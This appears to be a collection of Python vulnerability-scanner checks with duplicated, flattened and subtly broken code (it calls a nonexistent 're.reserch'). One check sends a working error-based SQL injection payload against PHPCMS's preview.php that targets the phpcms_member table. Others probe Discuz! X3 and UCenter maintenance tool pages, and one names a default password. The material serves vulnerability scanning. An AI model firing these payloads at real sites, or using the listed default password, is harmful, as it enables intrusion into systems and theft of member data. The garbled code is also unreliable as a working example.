def Audit(services): url = services['url'] +"/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(1),0x3a,md5(1),0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a" try: rqu =requests.get(url) res = rqu.text m = re.reserch('c4ca4238a0b923820dcc509a6f75849b',res) if m : security_hole(url) except: pass
def Audit(services): url = services['url'] +'/source/plugin/tools/tools.php' try: rqu =requests.get(url) if rqu.status_code == 200 : res = rqu.text m = re.reserch('Discuz',res) if m : security_hole(url+'Discuz! X3 急诊箱,可能存在默认密码:188281MWWxjk') except: pass
def Audit(services): url = services['url'] + '/source/plugin/tools/tools.php' try: rqu = requests.get(url) if rqu.status_code == 200: res = rqu.text m = re.reserch('Discuz', res) if m: security_hole(url + 'Discuz! X3 急诊箱,可能存在默认密码:188281MWWxjk') except: pass
def Audit(services): url = services['url'] + '/uc_server/uctools.php' try: rqu = requests.get(url) if rqu.status_code == 200: res = rqu.text m = re.reserch('Comsenz', res) if m: security_hole(url + 'Comsenz 系统维护工具箱(UCenter专用版)') except: pass
def Audit(services): url = services['url'] +'/uc_server/uctools.php' try: rqu =requests.get(url) if rqu.status_code == 200 : res = rqu.text m = re.reserch('Comsenz',res) if m : security_hole(url+'Comsenz 系统维护工具箱(UCenter专用版)') except: pass
def Audit(services): url = ( services["url"] + "/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(1),0x3a,md5(1),0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a" ) try: rqu = requests.get(url) res = rqu.text m = re.reserch("c4ca4238a0b923820dcc509a6f75849b", res) if m: security_hole(url) except: pass